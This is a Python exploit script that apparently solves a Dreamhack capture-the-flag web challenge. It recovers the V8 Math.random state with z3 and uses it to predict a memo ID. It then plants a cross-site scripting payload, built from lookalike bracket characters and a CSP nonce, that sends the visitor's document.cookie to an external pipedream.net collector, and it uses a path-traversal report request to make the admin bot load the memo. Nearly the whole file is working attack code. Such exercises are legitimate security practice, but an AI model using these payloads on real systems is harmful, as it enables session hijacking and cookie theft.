#!/usr/bin/python3
import z3
import struct
import requests
import hashlib

url = "http://host1.dreamhack.games:14042"
random = []

for i in range(5):
    res = requests.post(url+"/memo/create", json={"content": "\n","sourceEncoding":"UTF-16"})
    random.append(res.json()["data"]["random"])

# Introduce here 5 numbers generated by math.random() and run the script, this will guess the numbers
# Array.from(Array(5), Math.random)
# sequence = [
#     0.9393521429461191, 0.41531114892150334, 0.9501129878087993, 0.7957007078658203, 0.822086801282778
# ]

random = list(map(float, random))

sequence = random[::-1]

solver = z3.Solver()

se_state0, se_state1 = z3.BitVecs("se_state0 se_state1", 64)

for i in range(len(sequence)):

  se_s1 = se_state0
  se_s0 = se_state1
  se_state0 = se_s0
  se_s1 ^= se_s1 << 23
  se_s1 ^= z3.LShR(se_s1, 17)
  se_s1 ^= se_s0
  se_s1 ^= z3.LShR(se_s0, 26)
  se_state1 = se_s1

  float_64 = struct.pack("d", sequence[i] + 1)
  u_long_long_64 = struct.unpack("<Q", float_64)[0]

  mantissa = u_long_long_64 & ((1 << 52) - 1)
  solver.add(int(mantissa) == z3.LShR(se_state0, 12))

if solver.check() == z3.sat:
  model = solver.model()

  states = {}
  for state in model.decls():
    states[state.__str__()] = model[state]

  state0 = states["se_state0"].as_long()

  u_long_long_64 = (state0 >> 12) | 0x3FF0000000000000
  float_64 = struct.pack("<Q", u_long_long_64)
  next_sequence = struct.unpack("d", float_64)[0]
  next_sequence -= 1

  print(next_sequence)

memoId = hashlib.md5(str(next_sequence).encode()).hexdigest()
print(memoId)

res = requests.post(url+"/memo/create", json={"content": "﹤script nonce=30502580d81f844336d204b5f6ff1a84﹥location.href=\"https://eodxumeonkl064t.m.pipedream.net/?\".concat(document.cookie)﹤/script﹥","sourceEncoding":"UTF-8"})
print(res.json())

res = requests.post(url+"/report", json={"path": "../memo/test","memoId":memoId})
print(res.text)

# 